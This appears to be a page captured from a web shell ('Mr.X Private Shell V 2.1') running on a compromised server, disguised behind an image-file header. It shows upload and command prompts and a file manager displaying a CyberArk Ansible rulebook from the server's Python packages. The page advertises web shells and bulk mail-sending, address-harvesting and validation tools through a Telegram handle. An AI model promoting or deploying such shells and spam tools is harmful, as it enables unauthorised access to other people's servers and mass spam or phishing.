����JFIF��������� Mr.X 
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        

            For_More_Tools:
            
                Telegram: @jackleet | Bulk Smtp support mail sender  | Business Mail Collector  |  Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private

Upload:

Command:

deexcl@216.73.217.71: ~ $ 
- name: Demo rules with CyberArk syslog as source
  hosts: localhost 
  sources:
    - cyberark.pas.syslog:
        host: 0.0.0.0 
        port: 1514
  rules:
    - name: Check For User Suspension Event, Then Disable The User and Notify
      condition: event.cyberark.syslog.audit_record.Severity == "Error" and event.cyberark.syslog.audit_record.MessageID == "5"
      action:
        run_playbook:
          name: disable_user.yml
          extra_vars:
            username: "{{ event.cyberark.syslog.audit_record.Issuer }}"  
    - name: Check For PTA irregular IP OR irregular Hours Access and Notify
      condition: event.cyberark.DeviceEventClassID == "25" or event.cyberark.DeviceEventClassID == "23"
      action:
        run_playbook:
          name: pta_disable_notify.yml
          extra_vars:
            username: "{{ event.cyberark.suser }}"
            #username: "{{ event.cyberark.suser | ansible.builtin.regex_search('^[a-zA-Z0-9_]+') }}"
            eventname: "{{ event.cyberark.DeviceName }}"
            eventurl: "{{ event.cyberark.PTALink }}"
            station: "{{ event.cyberark.shost }}"

Filemanager

DIR : / usr/ lib/ python3.9/ site-packages/ ansible_collections/ cyberark/ pas/ rulebooks/
Name Type Size Permission Actions
cyberark_test_rule.yml File 1.09 KB 0644
disable_pas_user_kafka.yml File 560 B 0644
disable_pas_user_webhook.yml File 540 B 0644
disable_user.yml File 1.17 KB 0644
inventory.yml File 69 B 0644
pta_disable_notify.yml File 1.31 KB 0644
pta_notify.yml File 602 B 0644